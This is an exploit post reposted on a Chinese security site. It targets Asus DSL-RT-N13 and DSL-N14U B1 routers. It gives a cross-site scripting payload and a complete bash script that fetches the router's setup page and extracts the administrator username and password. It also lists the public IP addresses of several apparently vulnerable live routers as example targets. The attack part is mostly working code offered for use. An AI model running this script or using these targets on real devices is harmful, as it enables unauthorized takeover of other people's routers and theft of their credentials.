首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Asus Router Cross Site Script / Authentication Bypass
来源:vfocus.net 作者:4TT4CK3R 发布时间:2018-01-29  
In the name of god
-------------------------


Exploit Title :
--------------------
Asus Routers (DSL-RT-N13 , DSL-N14U B1) Vulnerability


Exploit Author :
---------------------
4TT4CK3R


Category :
---------------------
Remote and Local


Home Page :
---------------------
https://asus.com


Google Dork :
---------------------
None


Models that Vulnerable in here :
---------------------------------------------
-) DSL-RT-N13 > Bypass Authentication Vulnerability
-) DSL-N14U B1 > Cross Site Scripting Vulnerability



[##] DSL-N14U B1 Cross Site Scripting Vulnerability
--------------------------------------------------------------
This vulnerability works on target remote and local ip address.
Payload : ""><script>alert(window.location)</script>
Vulnerable Page : Main Page
Screenshot :
http://uupload.ir/files/az1i_shot.png



[##] DSL-RT-N13U Bypass Authentication Vulnerability
---------------------------------------------------------------
With this vulnerability we can find administrator username and password and
login into admin panel of asus router model DSL-RT-N13.
Exploit source of this vulnerability (ARE Script):

#!/bin/bash
# Asus Routers Exploit (ARE)
# Coded by : 4TT4CK3R
# Category : Local and Remote
# Reuirements : Opening ports 80,8080,443
# Models that affecta : DSL-RT N13
reset
dir = "/opt/"
rm -rf /opt/a.htm
clear
echo ""
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo
echo ""
echo " [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]"
echo ""
echo -e "\e[93m [+] Tool name: Asus Router Exploit\e[0m"
echo -e "\e[93m [+] Models that affecta : DSL-RT N13 \e[0m"
echo -e "\e[93m [+] Coded by: 4TT4CK3R\e[0m"
echo ""
echo " [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]"
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo
echo ""
echo ""
echo -e "\e[93m Options Of Tool: "
echo ""
echo "     1. Start"
echo "     2. About"
echo "     3. Exit"
echo ""
read -p " Please choose an option: " option
echo ""
echo ""
    if [ $option == "2" ]
        then
            clear
            echo ""
      for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done
; echo
      echo ""
      echo " [+] About this tool :"
      echo ""
      echo -e " Hi dear friend ... This tool is an asus router exploiter.
      This tool working with an vulnerability on Asus Routers and we can
using
      this tool for bypass authentication and exploit the router config
panel.
      Also this tool working on DSL-RT N13 models of asus company.
      Thanks for using this tool and my exploit."
      echo ""
      for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done
; echo
      echo ""
      echo ""
    elif [ $option == "3" ]
      then
        clear
        exit
    elif [ $option == "1" ]
        then
            clear
            echo ""
        for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ;
done ; echo
        echo ""
        echo " [+] Starting Steps "
        echo ""
        echo ""
        read -p " [++] Please enter target ip (ex: 5.2.5.5) : " ip
        echo ""
        read -p " [++] Please enter port number (ex: 8080) : " port
        echo ""
        read -p " [++] Please enter protocol (http or https) : " protocol
        echo ""
        echo " [**] Ok, Please wait ... "
        echo ""
        curl --silent $protocol://$ip:$port/QIS_wizard.htm > $dir/a.htm
        echo ""
        echo " [**] Searching data ..."
        echo ""
        cat $dir/a.htm | grep "http_username" | cut -d " " -f4 | cut -d '"'
-f2 > $dir/user
        cat $dir/a.htm | grep "http_passwd" | cut -d " " -f4 | cut -d '"'
-f2 > $dir/pass
        username=$(<$dir/user)
        password=$(<$dir/pass)
        echo ""
        for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ;
done ; echo
        echo ""
        echo " [>>] Address : $protocol://$ip:$port"
        echo " [>>] Username : $username"
        echo " [>>] Password : $password"
        echo ""
        for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ;
done ; echo
        echo ""
    else
      clear
      echo ""
      echo " [+] Wrong selection. exiting ..."
      sleep 2
      exit
   fi
exit


Video demo of this tool :
-----------------------------------
https://www.videosprout.com/video?id=be9d22de-6871-4521-96be-1c6def8c2cce


Other routers for example DSL-RT N13 model :
-------------------------------------------------
http://94.190.36.152
http://88.86.198.149:8080
http://220.133.187.27:8080


Other routers for example DSL-N14U B1 model :
-------------------------------------------------
http://80.188.231.233:8080
http://197.89.27.160:8080


Exploited by :
--------------------
4TT4CK3R

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ASUS DSL-N14U B1 Router 1.1.2.
·BMC BladeLogic 8.3.00.64 - Rem
·AsusWRT Router < 3.0.0.4.380.7
·Trend Micro Threat Discovery A
·Oracle VirtualBox < 5.1.30 / <
·Oracle WebLogic wls-wsat Compo
·RAVPower 2.000.056 - Root Remo
·macOS - 'sysctl_vfs_generic_co
·Sync Breeze Enterprise 9.5.16
·Arq 5.10 - Local Privilege Esc
·Kaltura Remote PHP Code Execut
·Arq 5.10 - Local Privilege Esc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved